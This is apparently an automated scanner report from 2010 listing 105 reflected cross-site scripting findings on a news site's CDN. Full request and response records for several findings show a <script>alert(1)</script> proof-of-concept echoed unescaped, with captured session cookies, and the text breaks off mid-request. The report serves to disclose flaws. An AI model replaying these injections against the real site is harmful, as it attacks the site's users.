Report generated by Hoyt LLC Research at Thu Nov 04 17:00:14 CDT 2010.


Cross Site Scripting Reports | Hoyt LLC Research

1. Cross-site scripting (reflected)

Loading

1.1. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 2]

1.2. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 3]

1.3. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 4]

1.4. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 5]

1.5. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 6]

1.6. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 7]

1.7. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 2]

1.8. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 3]

1.9. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 4]

1.10. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 5]

1.11. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 6]

1.12. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 7]

1.13. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 2]

1.14. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 3]

1.15. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 4]

1.16. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 5]

1.17. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 6]

1.18. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 7]

1.19. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 2]

1.20. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 3]

1.21. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 4]

1.22. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 5]

1.23. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 6]

1.24. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 7]

1.25. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 2]

1.26. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 3]

1.27. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 4]

1.28. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 5]

1.29. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 6]

1.30. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 7]

1.31. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 2]

1.32. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 3]

1.33. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 4]

1.34. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 5]

1.35. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 6]

1.36. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 7]

1.37. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 2]

1.38. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 3]

1.39. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 4]

1.40. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 5]

1.41. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 6]

1.42. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 7]

1.43. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 2]

1.44. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 3]

1.45. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 4]

1.46. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 5]

1.47. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 6]

1.48. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 7]

1.49. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 2]

1.50. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 3]

1.51. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 4]

1.52. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 5]

1.53. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 6]

1.54. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 7]

1.55. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 2]

1.56. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 3]

1.57. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 4]

1.58. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 5]

1.59. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 6]

1.60. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 7]

1.61. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 2]

1.62. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 3]

1.63. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 4]

1.64. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 5]

1.65. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 6]

1.66. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 2]

1.67. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 3]

1.68. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 4]

1.69. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 5]

1.70. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 6]

1.71. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/functions.js [REST URL parameter 2]

1.72. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/functions.js [REST URL parameter 3]

1.73. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/functions.js [REST URL parameter 4]

1.74. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/functions.js [REST URL parameter 5]

1.75. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/functions.js [REST URL parameter 6]

1.76. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js [REST URL parameter 2]

1.77. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js [REST URL parameter 3]

1.78. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js [REST URL parameter 4]

1.79. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js [REST URL parameter 5]

1.80. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js [REST URL parameter 6]

1.81. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 2]

1.82. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 3]

1.83. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 4]

1.84. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 5]

1.85. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 6]

1.86. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 2]

1.87. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 3]

1.88. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 4]

1.89. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 5]

1.90. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 6]

1.91. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 2]

1.92. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 3]

1.93. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 4]

1.94. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 5]

1.95. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 6]

1.96. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 2]

1.97. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 3]

1.98. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 4]

1.99. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 5]

1.100. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 6]

1.101. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 2]

1.102. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 3]

1.103. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 4]

1.104. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 5]

1.105. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 6]



1. Cross-site scripting (reflected)
There are 105 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1e2ed<script>alert(1)</script>5a04c6a8aa2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig1e2ed<script>alert(1)</script>5a04c6a8aa2/WebPortal/nypost/blocks/ads/ads.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:06 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig1e2ed<script>alert(1)</script>5a04c6a8aa2/WebPortal/nypost/blocks/ads/ads.js</p>
...[SNIP]...

1.2. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c0d14<script>alert(1)</script>0133414670e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortalc0d14<script>alert(1)</script>0133414670e/nypost/blocks/ads/ads.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:14 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortalc0d14<script>alert(1)</script>0133414670e/nypost/blocks/ads/ads.js</p>
...[SNIP]...

1.3. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cdab2<script>alert(1)</script>21a84147a08 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostcdab2<script>alert(1)</script>21a84147a08/blocks/ads/ads.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:21 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostcdab2<script>alert(1)</script>21a84147a08/blocks/ads/ads.js</p>
...[SNIP]...

1.4. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cf0cd<script>alert(1)</script>c7eab316849 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blockscf0cd<script>alert(1)</script>c7eab316849/ads/ads.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:28 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blockscf0cd<script>alert(1)</script>c7eab316849/ads/ads.js</p>
...[SNIP]...

1.5. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7ef21<script>alert(1)</script>7e167754e7a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/ads7ef21<script>alert(1)</script>7e167754e7a/ads.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:37 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/ads7ef21<script>alert(1)</script>7e167754e7a/ads.js</p>
...[SNIP]...

1.6. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 2081c<script>alert(1)</script>11f89c5bbb0 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js2081c<script>alert(1)</script>11f89c5bbb0 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:44 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js2081c<script>alert(1)</script>11f89c5bbb0</p>
...[SNIP]...

1.7. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48f7f<script>alert(1)</script>d51368caf7e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig48f7f<script>alert(1)</script>d51368caf7e/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
